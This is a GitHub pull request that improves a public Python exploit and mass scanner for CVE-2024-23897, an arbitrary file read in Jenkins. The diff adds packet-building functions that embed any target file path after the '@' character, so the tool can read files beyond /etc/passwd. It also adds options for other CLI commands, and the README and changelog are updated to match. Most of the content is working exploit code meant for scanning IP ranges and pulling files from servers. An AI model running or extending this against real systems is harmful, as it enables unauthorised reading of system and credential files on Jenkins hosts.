### PR TITLE
- The packet length will now adjust to ensure all file names will be …

### DIFF
--- a/CVE-2024-23897.py
+++ b/CVE-2024-23897.py
@@ -14,6 +14,7 @@ GREEN = "\033[92m"
 RED = "\033[91m"
 ENDC = "\033[0m"
 CONTENT_TYPE_OCTET_STREAM = 'application/octet-stream'
+ARBITRATY_CHAR = '@'
 
 def display_help_message():
     parser.print_help()
@@ -24,8 +25,6 @@ CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.
 Alexander Hagenah / @xaitax / ah@primepage.de"
 """
     print(BLUE + banner + ENDC)
-
-
 
 def expand_cidr(cidr):
     try:
@@ -107,7 +106,54 @@ def read_hosts_from_file(file_path):
 def write_to_output_file(file_path, data):
     with open(file_path, 'a', encoding='utf-8') as file:
         file.write(data + '\n')
+
+def build_data_segment(file_path,command,language):
+    return calculate_header_in_bytes(command) + calculate_payload_in_bytes(file_path) + calculate_tail_in_bytes(language)
+
+def calculate_header_in_bytes(command):
+    """Creates the header of the packet that contains the command."""
     
+    header_slice = ()
+    if command == "help":
+        header_slice = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00')
+    elif command == "who-am-i":
+        header_slice = (b'\x00\x00\x00\x0A\x00\x00\x08who-am-i\x00\x00\x00')
+    elif command == "connect-node":
+        header_slice = (b'\x00\x00\x00\x0E\x00\x00\x0Cconnect-node\x00\x00\x00')
+    else: 
+        header_slice = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00')
+
+    return header_slice
+
+def calculate_payload_in_bytes(file_path): 
+    """Creates the primary payload of the packet - including file path."""
+    
+    file_path = ARBITRATY_CHAR + file_path
+    hex_value_for_payload = decimal_to_hex(len(file_path))        
+    hex_value_for_payload_header = decimal_to_hex((len(file_path)+2))
+    payload_slice = (
+        b'' + hex_value_for_payload_header + b'\x00\x00' + hex_value_for_payload + file_path.encode()
+    )
+    return payload_slice 
+    
+def calculate_tail_in_bytes(language):
+    """Creates the tail end of the packet that contains language."""
+
+    tail_slice = (
+     b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05'+ language.encode() + b'\x00\x00\x00\x00\x03')
+    return tail_slice
+
+def decimal_to_hex(decimal_value):
+    """Converts a decimal value to its hexadecimal representation."""   
+
+    if not isinstance(decimal_value, int):
+      raise ValueError("Input must be an integer.") 
+    if decimal_value < 0:
+      raise ValueError("Input must be non-negative.")   
+    hex_string = hex(decimal_value)[2:]       
+    hex_bytes = bytes.fromhex(hex_string.zfill(2))  
+    return hex_bytes
+
 parser = argparse.ArgumentParser(description='CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 exploitation and scanner.')
 group = parser.add_mutually_exclusive_group(required=True)
 group.add_argument('-t', '--target', help='Target specification. Can be a single IP (e.g., 192.168.1.1), a range of IPs (e.g., 192.168.1.1-192.168.1.255), a list of IPs separated by commas (e.g., 192.168.1.1,192.168.1.2), or a CIDR block (e.g., 192.168.1.0/24).')
@@ -115,7 +161,8 @@ group.add_argument('-i', '--input-file', help='Path to input file containing hos
 parser.add_argument('-p', '--port', type=int, default=8080, help='Port number. Default is 8080.')
 parser.add_argument('-f', '--file', required=True, help='File to read on the target system. Only maximum of 3 lines can be extracted.')
 parser.add_argument('-o', '--output-file', help='Path to output file for saving the results.')
-
+parser.add_argument('-c', '--command',default="help", help="The jenkinds-cli.jar command [help|who-am-i|connect-node]. Default is 'help'.")
+parser.add_argument('-l', '--language',default="en_US", help="The language code you want to use." )
 
 display_banner() 
 
@@ -125,11 +172,10 @@ if len(sys.argv) == 1:
 
 args = parser.parse_args()
 
-data_bytes = (
-    b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' +
-    args.file.encode() +
-    b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
-)
+# data packet will adjust based on file
+data_bytes = build_data_segment(
+    args.file,args.command,
+    args.language)
 
 if args.input_file:
     target_urls = read_hosts_from_file(args.input_file)

--- a/README.md
+++ b/README.md
@@ -26,8 +26,16 @@ python CVE-2024-23897.py -i <input_file> -f <file>
 - `-o` or `--output-file`: Export results to file (optional).
 - `-p` or `--port`: Specify the port number. Default is 8080 (optional).
 - `-f` or `--file`: Specify the file to read on the target system.
+- `-o` or `--output`: Path to output file for saving the results (optional).
+- `-c` or `--command`: The jenkins-cli.jar command [help|who-am-i|connect-node]. Default is 'help' (optional).
+- `-l` or `--language`: The language code you want to use. Default is en_US (optional).
 
 ## 📆 Changelog
+
+### [26th Febuary 2024] - Bugs & Feature Request
+- The packet length will now adjust to ensure all file names will be uploaded with the correct packet lengths. i.e. works with more than just /etc/passwd or 11 character file lenghts.
+- Added `-c COMMAND` which allows the testing of other jenkins-cli.jar commands: who-am-i,connect-node. Default remains "help".
+- Added `-l LANGUAGE` which allows for the 5 byte language code, i.e. en_US, cn_ZH, etc. The default is en_US.
 
 ### [27th January 2024] - Feature Request
 

--- a/README.md
+++ b/README.md
@@ -32,7 +32,8 @@ python CVE-2024-23897.py -i <input_file> -f <file>
 
 ## 📆 Changelog
 
-### [26th Febuary 2024] - Bugs & Feature Request
+### [29th Febuary 2024] - Bugs & Feature Request (thanks to [@cbartholomew](https://www.linkedin.com/in/christophermbartholomew/))
+
 - The packet length will now adjust to ensure all file names will be uploaded with the correct packet lengths. i.e. works with more than just /etc/passwd or 11 character file lenghts.
 - Added `-c COMMAND` which allows the testing of other jenkins-cli.jar commands: who-am-i,connect-node. Default remains "help".
 - Added `-l LANGUAGE` which allows for the 5 byte language code, i.e. en_US, cn_ZH, etc. The default is en_US.


### PR DESCRIPTION
Dear Xaitax, 

Thus far your current script is probably best for this CVE; however, I wanted to add more variable file length adjustments and command support. Thank You.

…uploaded with the correct packet lengths. i.e. works with more than just `/etc/passwd` or 11 character file lengths.

- Added `-c COMMAND` which allows the testing of other `jenkins-cli.jar` commands: `who-am-i`,`connect-node`. Default remains `help`.
- Added `-l LANGUAGE` which allows for the 5 byte language code, i.e. `en_US`, `cn_ZH`, etc. The default is `en_US`.

I'm still fairly new to python, so I'm open to feedback suggestions. I wasn't sure if there was a preferred test suite you'd like to utilize; however, I have tested it manually. 

Thank You for your consideration.

![image](https://github.com/xaitax/CVE-2024-23897/assets/962366/fccf5007-e073-42d5-bba7-66ef1276edab)

![image](https://github.com/xaitax/CVE-2024-23897/assets/962366/cb472fba-4550-4360-bf1b-2188c7441f2f)

![image](https://github.com/xaitax/CVE-2024-23897/assets/962366/9aaca96a-6ede-428b-9231-11c21f0a655a)

edit: I have also updated the .md file documentation as well, added the additional flags including the missing -o flag. thank you!